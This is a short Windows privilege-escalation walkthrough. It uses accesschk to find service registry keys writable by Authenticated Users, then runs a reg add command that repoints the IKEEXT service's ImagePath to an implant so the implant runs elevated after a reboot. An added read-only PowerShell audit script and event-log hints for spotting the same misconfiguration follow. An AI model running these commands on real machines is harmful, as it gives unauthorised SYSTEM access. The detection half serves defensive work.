First: query write permissions on all service registry keys

accesschk.exe -accepteula -wuvskq "HKLM\System\CurrentControlSet\Services" > c:\rto\regs.txt

Second: open the file and search for the word "Authenticated"

notepad c:\rto\regs.txt

Notice that Authenticated Users have full access to the IKEEXT registry key

Third: let's query that registry key for interesting parameters

reg query HKLM\System\CurrentControlSet\Services\IKEEXT

Fourth: change the ImagePath value to point to our malicious payload

reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\rto\lpe\implant\implantsrv.exe /f

Now, once the machine is rebooted, we will be elevated
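
The same misconfiguration can be found and fixed before it is abused. The PowerShell audit below is an added example, not part of the original walkthrough; the set of low-privileged SIDs and the rights mask are choices made here, and the script only reads the registry.

```powershell
# Added audit example (not from the original page). Read-only: reports service
# keys under HKLM whose DACL lets low-privileged principals modify them.
$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Well-known SIDs held by ordinary logons (assumed scope for this audit).
$lowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Rights that allow changing ImagePath or the key's security descriptor.
$R = [System.Security.AccessControl.RegistryRights]
$writeMask = [int]($R::SetValue -bor $R::CreateSubKey -bor $R::Delete -bor
                   $R::ChangePermissions -bor $R::TakeOwnership)
# Generic rights can appear unmapped in an ACE: GENERIC_WRITE | GENERIC_ALL.
$genericMask = 0x40000000 -bor 0x10000000

$findings = foreach ($key in Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue) {
    try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
    # Ask for SIDs rather than names so the check is locale independent.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($rule in $rules) {
        $sid    = $rule.IdentityReference.Value
        $rights = [int]$rule.RegistryRights
        if ($rule.AccessControlType -ne 'Allow' -or -not $lowPriv.ContainsKey($sid)) { continue }
        if (($rights -band ($writeMask -bor $genericMask)) -eq 0) { continue }
        [pscustomobject]@{
            Service   = $key.PSChildName
            Principal = $lowPriv[$sid]
            Rights    = $rule.RegistryRights
            Inherited = $rule.IsInherited
            ImagePath = $key.GetValue('ImagePath', $null, 'DoNotExpandEnvironmentNames')
        }
    }
}
$findings | Sort-Object Service | Format-Table -AutoSize -Wrap
```

Any row it prints is a service key whose ACL should be tightened so that only administrators and SYSTEM can write to it. Registry auditing on these keys (Security event 4657, or Sysmon event 13) will record a change to ImagePath.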